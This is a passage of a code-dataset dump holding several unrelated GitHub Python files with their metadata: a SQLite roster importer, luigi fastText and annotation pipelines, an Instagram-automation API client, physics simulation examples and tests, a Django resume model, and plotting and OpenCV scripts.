first_name = \" \".join(name_parts[:-1])\n # player_name = \"%s, %s\" % (last_name, first_name)\n try:\n player_name = player_name\n except UnicodeDecodeError as e:\n import pdb; pdb.set_trace()\n raise(e)\n # import pdb; pdb.set_trace()\n cur = self.db.execute(\"SELECT player_id FROM players WHERE display_name=?\", (player_name,))\n player = cur.fetchone()\n player_id = None\n if not player:\n while player_id is None:\n player_id = self.__genID()\n self.db.execute(\"SELECT player_id FROM players WHERE player_id=?\", (player_id,))\n exists = cur.fetchone()\n if exists:\n player_id = None\n\n self.db.execute(\"INSERT INTO players (player_id, display_name, date_created) VALUES (?,?,datetime('now'))\", (player_id, player_name))\n self.db.commit()\n\n else:\n player_id = player['player_id']\n\n cap_number = None\n if re.match(r\"\\d+\", row['cap_number']):\n cap_number = int(row['cap_number'])\n # if row['cap_number'] > 0:\n # cap_number = row['cap_number']\n\n is_coach = False\n coach_title = None\n if 'designation' in row and row['designation']:\n designation = row['designation']\n if designation in [\"coach\", \"Coach\", \"Manager\", \"Support Staff\"]:\n is_coach = True\n coach_title = designation\n try:\n cur = self.db.execute(\"INSERT INTO rosters (tid, player_id, team_id, cap_number, is_coach, coach_title) VALUES (?,?,?,?,?,?)\", (tid, player_id, team_id, cap_number, is_coach, coach_title))\n self.db.commit()\n except sqlite3.IntegrityError as e:\n print(\"Error inserting player %s due to duplicate, team: %s, cap_number: %s\" % (player_name, team_id, cap_number))\n sys.exit(1)\n\n def __genID(self):\n return b64encode(urandom(6), b\"Aa\").decode(\"utf-8\")\n\nif __name__ == \"__main__\":\n \"\"\" Main function, uses sys.argv to pull in a directory, defaults to clear contents and full import\n \"\"\"\n src_folder = None\n try:\n src_folder = sys.argv[1].strip(\"/\")\n except IndexError:\n print(\"Must give me a directory to import\")\n sys.exit(1)\n\n if os.path.isdir(src_folder):\n print(\"Importing from directory %s\" % src_folder)\n else:\n print(\"Directory doesn't exist %s\" % src_folder)\n sys.exit(1)\n\n db_file = os.path.join('scoreboard/scores.db')\n\n importer = Import(db_file)\n importer.setSource(src_folder)\n importer.importAll(clear=True)\n sys.exit(0)\n","repo_name":"uwhscores/scoreboard","sub_path":"import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":21620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40275003385","text":"import os\nimport hashlib\nfrom functools import reduce\n\nimport luigi\nfrom luigi.util import requires, inherits\nfrom sklearn.externals import joblib\nfrom plumbum import local, FG\n\nfrom ..core import ExtractFeature, CoreParams\n\n\ndef concat_rowwise(x, y):\n return x + '|' + y\n\n\n@inherits(CoreParams)\nclass FastTextInput(luigi.Task):\n features = luigi.Parameter()\n\n @property\n def features_as_array(self):\n return self.features.split(',')\n\n def requires(self):\n return [\n self.clone(ExtractFeature, feature_name=x) for x in self.features_as_array\n ]\n\n def output(self):\n hash_content = f'{self.features}|{self.id_column}|{self.dataset}'\n hash_object = hashlib.md5(hash_content.encode('utf-8'))\n digest = hash_object.hexdigest()[:6]\n return luigi.LocalTarget(f'_features/fasttext_input_{digest}.txt')\n\n def run(self):\n self.output().makedirs()\n\n dfs = [joblib.load(x.path) for x in self.input()]\n s_features = [df[x].fillna('') for df, x in zip(dfs, self.features_as_array)]\n joined_rows = reduce(concat_rowwise, s_features)\n with open(self.output().path, 'w+') as out_file:\n out_file.write('\\n\\n#####\\n'.join(joined_rows))\n\n\n@requires(FastTextInput)\nclass FastTextVectors(luigi.Task):\n fasttext_path = luigi.Parameter(\n significant=False,\n default='~/projects/fasttext/fasttext',\n )\n\n def output(self):\n hash_content = f'{self.features}|{self.id_column}|{self.dataset}'\n hash_object = hashlib.md5(hash_content.encode('utf-8'))\n digest = hash_object.hexdigest()[:6]\n return luigi.LocalTarget(f'_features/fasttext_model_{digest}.vec')\n\n def run(self):\n self.output().makedirs()\n\n fasttext = local[self.fasttext_path]\n out_path, _ = os.path.splitext(self.output().path)\n\n fasttext['skipgram', '-input',\n self.input().path, '-output', out_path, '-minn', '1'] & FG\n","repo_name":"xelibrion/kaggle-avito-demand-prediction","sub_path":"src/pipeline/feature_eng/text/fasttext.py","file_name":"fasttext.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21933789927","text":"#\n\nfrom __future__ import annotations\n\nimport asyncio\nfrom functools import wraps\nfrom typing import Dict\n\nfrom aiohttp import ClientSession, TCPConnector\nfrom loguru import logger\n\nfrom .schemas.fake import InstanceTypes\n\n\nclass FakeAPI:\n def __init__(self, host: str, port: int):\n self._host = host\n self._port = port\n self._client_session: ClientSession | None = None\n\n async def start(self):\n connector = TCPConnector(limit=50)\n self._client_session = ClientSession(connector=connector)\n\n async def stop(self):\n await self._client_session.close()\n\n @property\n def base_url(self) -> str:\n return f'http://{self._host}:{self._port}{{method}}'\n\n @staticmethod\n def retry_async(num_tries):\n def decorator(func):\n @wraps(func)\n async def wrapper(*args, **kwargs):\n for i in range(num_tries):\n try:\n return await func(*args, **kwargs)\n except Exception as e:\n if i == num_tries - 1:\n logger.error(e)\n raise e\n await asyncio.sleep(0.02)\n\n return wrapper\n\n return decorator\n\n \"\"\"\n Фейки\n \"\"\"\n\n @retry_async(3)\n async def analyze(self, instance: str, last_max_id: str | None) -> Dict[str, str]:\n params = {'instance': instance}\n if last_max_id:\n params['last_max_id'] = last_max_id\n response = await self._client_session.post(\n self.base_url.format(method=f'/api/analyze/analyze'),\n params=params)\n return await response.json()\n\n @retry_async(3)\n async def unfollow(self, action_id: str, instance: str) -> Dict[str, str]:\n response = await self._client_session.post(\n self.base_url.format(method=f'/api/analyze/unfollow'),\n params={'action_id': action_id, 'instance': instance})\n return await response.json()\n\n @retry_async(3)\n async def like(self, account_id: str, instance: str, instance_type: InstanceTypes,\n last_max_id: str | None = None, bio: str | None = None) -> Dict[str, str]:\n response = await self._client_session.post(\n self.base_url.format(method=f'/api/story_like/like'),\n params={'instance': instance, 'last_max_id': last_max_id, 'instance_type': instance_type,\n 'account_id': account_id, 'bio': bio})\n return await response.json()\n","repo_name":"bubled33/instaproapi","sub_path":"instaproapi/fake_api.py","file_name":"fake_api.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42198466452","text":"from collections import OrderedDict\nimport itertools\nimport sys\n\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\n\nfrom flowket.callbacks.monte_carlo import TensorBoardWithGeneratorValidationData, \\\n default_wave_function_stats_callbacks_factory\nfrom flowket.machines import SimpleConvNetAutoregressive1D, ComplexValuesSimpleConvNetAutoregressive1D\nfrom flowket.operators import Heisenberg\nfrom flowket.optimization import VariationalMonteCarlo, loss_for_energy_minimization\nfrom flowket.samplers import FastAutoregressiveSampler\n\nparams_grid_config = {\n 'width': [16, 32],\n 'depth': [5, 8],\n 'lr': [1e-3, 1e-2, 5e-3],\n 'complex_ops': [True, False]\n}\nrun_index = int(sys.argv[-1].strip())\nks, vs = zip(*params_grid_config.items())\nparams_options = list(itertools.product(*vs))\nchosen_v = params_options[run_index % len(params_options)]\nparams = dict(zip(ks, chosen_v))\nprint('Chosen params: %s' % str(params))\n\nhilbert_state_shape = (20,)\ninputs = Input(shape=hilbert_state_shape, dtype='int8')\nif params['complex_ops']:\n convnet = ComplexValuesSimpleConvNetAutoregressive1D(inputs, depth=params['depth'],\n num_of_channels=params['width'], max_dilation_rate=4)\nelse:\n convnet = SimpleConvNetAutoregressive1D(inputs, depth=params['depth'], num_of_channels=params['width'] * 2,\n max_dilation_rate=4, weights_normalization=False)\npredictions, conditional_log_probs = convnet.predictions, convnet.conditional_log_probs\nmodel = Model(inputs=inputs, outputs=predictions)\nconditional_log_probs_model = Model(inputs=inputs, outputs=conditional_log_probs)\n\nbatch_size = 1000\nsteps_per_epoch = 300\n\noptimizer = Adam(lr=params['lr'], beta_1=0.9, beta_2=0.999)\nmodel.compile(optimizer=optimizer, loss=loss_for_energy_minimization)\nmodel.summary()\noperator = Heisenberg(hilbert_state_shape=hilbert_state_shape, pbc=True)\nsampler = FastAutoregressiveSampler(conditional_log_probs_model, batch_size)\nvariational_monte_carlo = VariationalMonteCarlo(model, operator, sampler)\n\nrun_name = 'naqs_complex_ops_%s_dilation_depth_%s_width_%s_adam_lr_%s_run_%s' % \\\n (params['complex_ops'], params['depth'], params['width'], params['lr'], run_index)\ntensorboard = TensorBoardWithGeneratorValidationData(log_dir='tensorboard_logs/%s' % run_name,\n generator=variational_monte_carlo, update_freq=1,\n histogram_freq=1, batch_size=batch_size, write_output=False)\ncallbacks = default_wave_function_stats_callbacks_factory(variational_monte_carlo,\n true_ground_state_energy=-35.6175461195) + [tensorboard]\nmodel.fit_generator(variational_monte_carlo.to_generator(), steps_per_epoch=steps_per_epoch, epochs=15,\n callbacks=callbacks, max_queue_size=0, workers=0)\n","repo_name":"HUJI-Deep/FlowKet","sub_path":"examples/complex_ops_autoregressive_heisenberg_1d.py","file_name":"complex_ops_autoregressive_heisenberg_1d.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"31"} +{"seq_id":"38010004640","text":"'''Provides workflows for data preparation for annotation for\nthe worm segmentation training workflow.\n\n'''\nimport luigi\n\nfrom ggjw.workflows.base import JobSystemWorkflow\n\nfrom ggjw.tasks.segmentation.prepare_for_annotation import PrepareRandomlySelectedImagesForAnnotation\nfrom ggjw.tasks.segmentation.prepare_for_annotation import PrepareManuallySelectedImagesForAnnotation\n\n# NOTE this defines the workflows as they are picked up by the MJS\n# frontend. Unfortunately, it does not discover inherited parameters,\n# such that we have to replicate the paramteer definition here instead\n# of just using inheritance.\n\n\nclass PrepareRandomlySelectedImagesForAnnotationWorkflow(\n luigi.WrapperTask, JobSystemWorkflow):\n '''Prepare images for annotation by random sampling from\n the given experiment.\n '''\n\n input_folder = luigi.Parameter()\n '''Input folder to collect from.\n '''\n\n file_pattern = luigi.Parameter()\n '''Filename pattern matching files to be included.\n Allowed wildcards are *, ?, [seq] and [!seq] (see fnmatch)\n '''\n\n output_folder = luigi.Parameter()\n '''Output folder to write projections into.\n '''\n\n num_samples = luigi.IntParameter()\n '''Number of samples to draw.\n '''\n\n seed = luigi.IntParameter(default=13)\n '''Seed for random sampling.\n '''\n\n task_namespace = 'ggrosshans'\n\n def requires(self):\n '''launch the actual worker tasks.\n '''\n yield PrepareRandomlySelectedImagesForAnnotation(\n input_folder=self.input_folder,\n output_folder=self.output_folder,\n file_pattern=self.file_pattern,\n num_samples=self.num_samples,\n seed=self.seed)\n\n\nclass PrepareManuallySelectedImagesForAnnotationWorkflow(\n luigi.WrapperTask, JobSystemWorkflow):\n '''Prepare images for annotation based on a manually generated\n list of positions and timepoints.\n '''\n\n input_folder = luigi.Parameter()\n '''Input folder to collect from.\n '''\n\n file_pattern = luigi.Parameter()\n '''Filename pattern matching files to be included.\n Allowed wildcards are *, ?, [seq] and [!seq] (see fnmatch).\n\n Note that this pattern should *not* contain position, timepoint or\n file extension as it will be combined with subfolder, position and\n timepoint from the given input_file.\n\n '''\n\n output_folder = luigi.Parameter()\n '''Output folder to write projections into.\n '''\n\n input_file = luigi.Parameter()\n '''Manually generated collections of images to prepare [.csv].\n\n Must contain the following columns:\n\n folder, position, timepoint\n\n the files are expected at the following location:\n\n //\n '''\n\n task_namespace = 'ggrosshans'\n\n def requires(self):\n '''launch the actual worker tasks.\n '''\n yield PrepareManuallySelectedImagesForAnnotation(\n input_folder=self.input_folder,\n output_folder=self.output_folder,\n input_file=self.input_file,\n file_pattern=self.file_pattern)\n","repo_name":"fmi-basel/ggrosshans-jobsystem-workflows","sub_path":"ggjw/workflows/worm_segm_annotation.py","file_name":"worm_segm_annotation.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28283120752","text":"from django.db import models\n\n# Create your models here.\n\n\nclass Resume(models.Model):\n\t# python -m pip install Pillow\n\tuser_image = models.ImageField(\n\t\tupload_to ='images', \n\t\tmax_length=255,\n\t\tdefault='/images/user_image.jpg')\n\tuser_full_name = models.CharField(\n\t\tmax_length=200,\n\t\tverbose_name='Full Name'\n\t\t)\n\tuser_job=models.CharField(\n\t\tmax_length=250,\n\t\tblank=True,\n\t\tnull=True,\n\t\tdefault='Programmer',\n\t\t)\n\tuser_description=models.CharField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tmax_length=500\n\t\t)\n\tuser_experience=models.TextField(\n\t\tverbose_name='My Experience as a Django Developer',\n\t\tdefault='No experience:)'\n\t\t)\n\tuser_knowledge=models.TextField(\n\t\tverbose_name='What I Know'\n\t\t)\n\n\tuser_skill=models.TextField(\n\t\tverbose_name='Education and Training',\n\t\t)\n\tuser_achievement=models.TextField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tverbose_name='My Achievements'\n\t\t)\n\textra_info=models.TextField(\n\t\tblank=True,\n\t\tnull=True,\n\t\tverbose_name='Extra Information',\n\t\tdefault='No Information',\n\t\t)\n\n\tdef __str__(self):\n\t\treturn f\"Hi I'm {self.user_full_name}!\\n{self.user_description}\"","repo_name":"jamshid1598/Portfolio_Example","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16385409375","text":"# -*- coding: utf-8 -*-\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mpd\nimport numpy as np\n\nimport sys,os\nxpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,'thirdParty','pyqtgraph-0.9.10'))\nsys.path.append(xpower)\nimport pyqtgraph as pg\n\nfrom PyQt4 import QtGui,QtCore\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n\nclass midBaseAnalyzer():\n \"\"\"\"\"\"\n #----------------------------------------------------------------------\n def __init__(self,Globals=None):\n \"\"\"\n 在XPower中执行时,此类的对象是临时的。\n 若作为显示窗体的对象调用时,对象内存在show后需要不被释放\n 所以,设置此父对象参数,使本对象和父对象一样长寿。\n 在展示某个窗口时,为了使某个弹出窗口可以多次并存弹出,被弹出窗口也需要重复定义并全局化\n \"\"\"\n self.Globals = Globals\n self.Globals.append(self)\n def addText(self,ax,xAxis,yAxis): #mid add some y value to ax.\n for x,y in zip(xAxis,yAxis):\n text = '('+str(round(y,3))+')'\n ax.annotate(text,xy=(x,y)) \n #----------------------------------------------------------------------\n def portfolioPlot(self,ax,bDrawText=False):\n \"\"\"\"\"\"\n date = np.array([mpd.date2num(date) for date in self.results.index]) \n if 'portfolio_value' in self.results:\n ax.plot(date,self.results.portfolio_value,pen=(255,255,255))\n ax.scatterAddition(date, self.results.portfolio_value) \n def positionCostPlot(self,ax,bDrawText=False): \n if 'position_cost' in self.results:\n position_cost = self.results.position_cost\n date = np.array([mpd.date2num(date) for date in self.results.index]) \n \n indexOfZero = position_cost[:] == 0\n count = len(position_cost[indexOfZero])\n \n #date[0:count] = position_cost[count]\n \n dateOfNoneZero = date[count:]\n position_costOfNoneZero = position_cost[count:]\n \n ax.plot(dateOfNoneZero,position_costOfNoneZero ,pen=(255,255,255), name=\"Position curve\")\n ax.scatterAddition(dateOfNoneZero, position_costOfNoneZero) \n \n def positionVolumePlot(self,ax,bDrawText=False): \n if 'position_volume' in self.results:\n position_volume = self.results.position_volume\n date = np.array([mpd.date2num(date) for date in self.results.index]) \n \n ax.plot(date, position_volume,pen=(255,255,255), name=\"Position curve\")\n ax.scatterAddition(date, position_volume) \n \n def positionPnlPlot(self,ax,bDrawText=False):\n date = np.array([mpd.date2num(date) for date in self.results.index])\n if 'position_pnl' in self.results:\n position_pnl = np.array(self.results.position_pnl)\n ax.plot(date,position_pnl , pen=(255,255,255), name=\"Red curve\")\n ax.scatterAddition(date, position_pnl) \n \n \n #----------------------------------------------------------------------\n def pricePlot(self,ax,bDrawText=False):\n \"\"\"\"\"\"\n date = np.array([mpd.date2num(date) for date in self.results.index]) \n if 'AAPL' in self.results:\n ax.plot(date,self.results.AAPL)\n ax.scatterAddition(date, self.results.AAPL)\n\n def initDialog(self,results=None,KData=None,bDrawText=False,InKLine = False):\n # 1) creates layouts\n dialog = QtGui.QDialog() \n mainLayout = QtGui.QHBoxLayout()\n rightLayout = QtGui.QVBoxLayout()\n mainLayout.addLayout(rightLayout)\n dialog.setLayout(mainLayout) \n dialog.setWindowTitle(('Strategy Results'))\n\n import os,sys \n xpower = os.path.abspath(os.path.join(os.path.dirname(__file__),os.pardir,os.pardir,os.pardir,'midProjects','histdataUI'))\n sys.path.append(xpower)\n\n from Widgets.pgCandleWidgetCross import pgCandleWidgetCross\n from Widgets.pgCrossAddition import pgCrossAddition\n from pyqtgraph.dockarea import DockArea,Dock \n area = DockArea() \n rightLayout.addWidget(area)\n\n # 2) creates widgets \n # 2.1)candle \n pgCandleView = pgCandleWidgetCross(dataForCandle=KData) \n self.pricePlot(pgCandleView) \n if(InKLine):\n self.indicatorsPlot(pgCandleView) \n self.signalPlot(pgCandleView,yBuy = KData.take([1],axis=1),ySell = KData.take([1],axis=1))\n dCandle = Dock(\"candles\",closable=True, size=(200,300)) ## give this dock the minimum possible size\n area.addDock(dCandle, 'bottom') \n dCandle.addWidget(pgCandleView) \n\n # 2.2)position_pnl 当前position_pnl曲线\n if(True):\n PyqtGraphPnl = pgCrossAddition()\n self.positionPnlPlot(PyqtGraphPnl,bDrawText=bDrawText)\n position_pnl = np.array(self.results.position_pnl)\n self.signalPlot(PyqtGraphPnl,yBuy = position_pnl,ySell = position_pnl)\n dPnl = Dock(\"position_pnl\", closable=True, size=(200,100))\n area.addDock(dPnl, 'bottom') \n dPnl.addWidget(PyqtGraphPnl) \n PyqtGraphPnl.setXLink(pgCandleView)\n # 2.3)position_cost \n if(True):\n PyqtGraphPositionCost = pgCrossAddition()\n self.positionCostPlot(PyqtGraphPositionCost)\n dPositionCost = Dock(\"position_cost\",closable=True, size=(200,100))\n area.addDock(dPositionCost, 'bottom') \n dPositionCost.addWidget(PyqtGraphPositionCost) \n PyqtGraphPositionCost.setXLink(pgCandleView) \n # 2.3)position_volume\n if(False):\n PyqtGraphPosition = pgCrossAddition()\n self.positionVolumePlot(PyqtGraphPosition)\n dPosition = Dock(\"position_volume\",closable=True, size=(200,100))\n area.addDock(dPosition, 'bottom') \n dPosition.addWidget(PyqtGraphPosition) \n PyqtGraphPosition.setXLink(pgCandleView)\n # 2.4)portfolio 总资产变动曲线 cash + equity\n if(True):\n PyqtGraphPortfolio = pgCrossAddition()\n self.portfolioPlot(PyqtGraphPortfolio)\n dPortfolio = Dock(\"portfolio\", closable=True,size=(200,100))\n area.addDock(dPortfolio, 'bottom') \n dPortfolio.addWidget(PyqtGraphPortfolio) \n PyqtGraphPortfolio.setXLink(pgCandleView)\n # 2.5)indicator\n if(True):\n PyqtGraphindicators = pgCrossAddition()\n self.pricePlot(PyqtGraphindicators) \n self.indicatorsPlot(PyqtGraphindicators)\n \n self.signalPlot(PyqtGraphindicators)\n \n dIndicator = Dock(\"indicator\",closable=True, size=(200,100))\n dIndicator.addWidget(PyqtGraphindicators)\n area.addDock(dIndicator, 'bottom', dCandle) \n PyqtGraphindicators.setXLink(pgCandleView)\n return dialog\n def analyze(self,results=None,KData=None,bDrawText=False,InKLine = False):\n # Plot the portfolio and asset data.\n self.results = results \n dialog = self.initDialog(results=results, KData=KData,InKLine = InKLine)\n self.Globals.append(dialog)\n dialog.showMaximized() \n \n","repo_name":"UpSea/PyAlgoTradeMid","sub_path":"upsea_Ver_0.1/Ea_00_BaseClass/midBaseAnalyzer.py","file_name":"midBaseAnalyzer.py","file_ext":"py","file_size_in_byte":7492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19928330278","text":"import calculator\n\n\ndef test_add_both_positive():\n # Setup\n a = 3\n b = 2\n # Specify expected result\n expected = 5\n # Exercise system under test\n actual = calculator.add(a, b)\n # Verify result\n assert actual == expected\n","repo_name":"SabrinaHuajy/ResearchCodingClub.github.io","sub_path":"examples/tdd_19113/test_calculator.py","file_name":"test_calculator.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"39775373722","text":"# -*- coing:utf-8 -*-\nimport tensorflow as tf\n# =================================================\n# read MNIST DB\n# =================================================\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"data/\", one_hot=True)\n\nimport numpy as np\nimport cv2 #opencv 모듈을 불러오기 위해서는 import opencv가 아니라 import cv2를 하여야한다.\n\nn1 = np.random.randint(10,200,[256,256,3]) #유색의 랜덤한 그림을 만든다.\n#n1 = np.zeros([1792,828,3]) #828 x 1792짜리 jpg파일을 만들 틀.\n#n1[:][:][0] = np.random.randint(10,200,[1792,828])\n\n\nimage=cv2.imread(\"9D194DF8-01FE-4E4E-8AE0-522C77143077.jpg\",-1) #cv2.imread(디렉토리 상의 파일 이름, 그 파일을 어떤식으로 읽을 것인지 모드 정하기) -> ndarray 반환\nprint(f'image의 타입 : {type(image)}, image의 shape : {image.shape}, image의 값 : {image}')\ntmp= cv2.namedWindow('window',cv2.WINDOW_NORMAL)\n#cv2.imshow('window',n1); cv2.waitKey(0)\nmodified_image = {}\n\nmodified_image['up_down_invert'] = image[::-1]\nmodified_image['half_row'] = image[:len(image)//2]\nmodified_image['column_row'] = image.transpose()[:len(image.transpose())//2].transpose()\nprint(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n#print(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n#print(f'modified_image의 타입 : {type(modified_image[\"up_down_invert\"])}, modified_image의 shape : {modified_image[\"up_down_invert\"].shape}, modified_image의 값 : {modified_image[\"up_down_invert\"]}')\n\n\n#window = cv2.namedWindow('Koala', cv2.WINDOW_AUTOSIZE) #WINDOW_AUTOSIZE\n#cv2.imshow(window, image); cv2.waitKey(0);\nimage = -image; #근데 이것도 몇비트 사진인가에 따라 다른거 아닌가? 아니였음.. 그림이 24비트 사진이라 해도 이건 무조건 255였네.\n#cv2.imshow('Inverted Koala',image); cv2.waitKey(0);\n#cv2.imwrite(\"inverted_sw.jpg\", image)\n\nfor i in range(50): #애니 매이션 만들기\n if (i%10 == 0) or (i%10 == 1) or(i%10 == 2) or(i%10 == 3) or(i%10 == 4): #반은 흑백, 반은 컬러 처리\n n1 = np.random.randint(np.random.randint(0,20,[1]), np.random.randint(100,300,[1]), [256, 256])\n else :\n n1 = np.random.randint(np.random.randint(0,20,[1]), np.random.randint(100,300,[1]), [256, 256,3])\n\n cv2.imwrite('muneo.jpg',n1)\n image = cv2.imread('muneo.jpg', -1)\n cv2.imshow('Random_Animation',image)\n cv2.waitKey(100)\nwindow = cv2.namedWindow('Number_Animation', cv2.WINDOW_NORMAL)\nfor i in range(5): #애니 매이션 만들기\n cv2.imshow(window,mnist.test.images[np.random.randint(0,10000)])\n cv2.waitKey(1000)\n\n\ncv2.destroyAllWindows()\n\n#column_half = n1.transpose()[:len(n1.transpose())//2]","repo_name":"hangdragon/DNN","sub_path":"openCV/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16302444391","text":"import unittest\n\nimport jVMC\nimport jVMC.operator as op\nimport jax\nimport jax.numpy as jnp\n\n\nclass TestPOVM(unittest.TestCase):\n def prepare_net(self, L, dt, hiddenSize=1, depth=1, cell=\"RNN\"):\n def copy_dict(a):\n b = {}\n for key, value in a.items():\n if type(value) == type(a):\n b[key] = copy_dict(value)\n else:\n b[key] = value\n return b\n\n sample_shape = (L,)\n\n self.psi = jVMC.util.util.init_net({\"batch_size\": 200, \"net1\":\n {\"type\": \"RNN\",\n \"translation\": {\"use\": True, \"factor\": 1},\n \"parameters\": {\"inputDim\": 4,\n \"realValuedOutput\": True,\n \"realValuedParams\": True,\n \"logProbFactor\": 1, \"hiddenSize\": hiddenSize, \"L\": L, \"depth\": depth, \"cell\": cell}}},\n sample_shape, 1234)\n\n system_data = {\"dim\": \"1D\", \"L\": L}\n self.povm = op.POVM(system_data)\n\n prob_dist = jVMC.operator.povm.get_1_particle_distributions(\"y_up\", self.povm)\n prob_dist /= prob_dist[0]\n biases = jnp.log(prob_dist[1:])\n params = copy_dict(self.psi._param_unflatten(self.psi.get_parameters()))\n\n params[\"net\"][\"outputDense\"][\"bias\"] = biases\n params[\"net\"][\"outputDense\"][\"kernel\"] = 1e-15 * params[\"net\"][\"outputDense\"][\"kernel\"]\n params = jnp.concatenate([p.ravel()\n for p in jax.tree_util.tree_flatten(params)[0]])\n self.psi.set_parameters(params)\n\n self.sampler = jVMC.sampler.ExactSampler(self.psi, (L,), lDim=4, logProbFactor=1)\n\n self.tdvpEquation = jVMC.util.tdvp.TDVP(self.sampler, rhsPrefactor=-1.,\n svdTol=1e-6, diagonalShift=0, makeReal='real', crossValidation=False)\n\n #self.stepper = jVMC.util.stepper.Euler(timeStep=dt) # ODE integrator\n self.stepper = jVMC.util.stepper.Heun(timeStep=dt) # ODE integrator\n\n def test_matrix_to_povm(self):\n unity = jnp.eye(2)\n zero_matrix = jnp.zeros((2, 2))\n\n system_data = {\"dim\": \"1D\", \"L\": 2}\n povm = jVMC.operator.POVM(system_data)\n\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='observable'),\n jnp.ones(4)).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='unitary'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='dissipative'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='imaginary'),\n -2*jnp.eye(4)).all())\n\n self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='observable'),\n jnp.zeros(4)).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='unitary'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='dissipative'),\n jnp.zeros((4, 4))).all())\n self.assertTrue(jnp.isclose(op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='imaginary'),\n jnp.zeros((4, 4))).all())\n\n self.assertRaises(ValueError, op.matrix_to_povm, zero_matrix, povm.M, povm.T_inv, mode='wrong_mode')\n\n def test_adding_operator(self):\n unity = jnp.eye(2)\n zero_matrix = jnp.zeros((2, 2))\n\n system_data = {\"dim\": \"1D\", \"L\": 2}\n povm = jVMC.operator.POVM(system_data)\n\n unity_povm = op.matrix_to_povm(unity, povm.M, povm.T_inv, mode='unitary')\n zeros_povm = op.matrix_to_povm(zero_matrix, povm.M, povm.T_inv, mode='dissipative')\n\n self.assertFalse(\"unity\" in povm.operators.keys())\n self.assertFalse(\"zero\" in povm.operators.keys())\n\n povm.add_unitary(\"unity\", unity_povm)\n povm.add_dissipator(\"zero\", zeros_povm)\n\n self.assertTrue(\"unity\" in povm.operators.keys())\n self.assertTrue(\"zero\" in povm.operators.keys())\n\n self.assertRaises(ValueError, povm.add_unitary, \"zero\", op.matrix_to_povm(zero_matrix, povm.M,\n povm.T_inv, mode='unitary'))\n self.assertRaises(ValueError, povm.add_dissipator, \"unity\", op.matrix_to_povm(unity, povm.M,\n povm.T_inv, mode='dissipative'))\n\n def test_time_evolution_one_site(self):\n # This tests the time evolution of a sample system and compares it with the analytical solution\n\n L = 3\n Tmax = 0.5\n dt = 2E-3\n\n self.prepare_net(L, dt, hiddenSize=1, depth=1)\n\n Lindbladian = op.POVMOperator(self.povm)\n for l in range(L):\n Lindbladian.add({\"name\": \"X\", \"strength\": 3.0, \"sites\": (l,)})\n Lindbladian.add({\"name\": \"dephasing\", \"strength\": 1.0, \"sites\": (l,)})\n\n res = {\"X\": [], \"Y\": [], \"Z\": []}\n\n times = []\n t=0.\n while t0.005:\n self.stepper.set_dt(3e-2)\n\n dp, stepSize = self.stepper.step(0, self.tdvpEquation, self.psi.get_parameters(), hamiltonian=Lindbladian,\n psi=self.psi)\n \n t += stepSize\n\n self.psi.set_parameters(dp)\n\n times = jnp.array(times)\n\n # Analytical solution\n w = jnp.sqrt(35)\n Sx_avg = jnp.zeros_like(times)\n Sy_avg = (w * jnp.cos(w * times) - jnp.sin(w * times)) / w * jnp.exp(-times)\n Sz_avg = 6 / w * jnp.sin(w * times) * jnp.exp(-times)\n\n print(Sz_avg-jnp.asarray(res[\"Z\"]))\n self.assertTrue(jnp.allclose(Sx_avg, jnp.asarray(res[\"X\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sy_avg, jnp.asarray(res[\"Y\"]), atol=1e-2))\n self.assertTrue(jnp.allclose(Sz_avg, jnp.asarray(res[\"Z\"]), atol=1e-2))\n\n def test_time_evolution_two_site(self):\n # This tests the time evolution of a sample system and compares it with the analytical solution\n\n L = 3\n Tmax = 0.25\n dt = 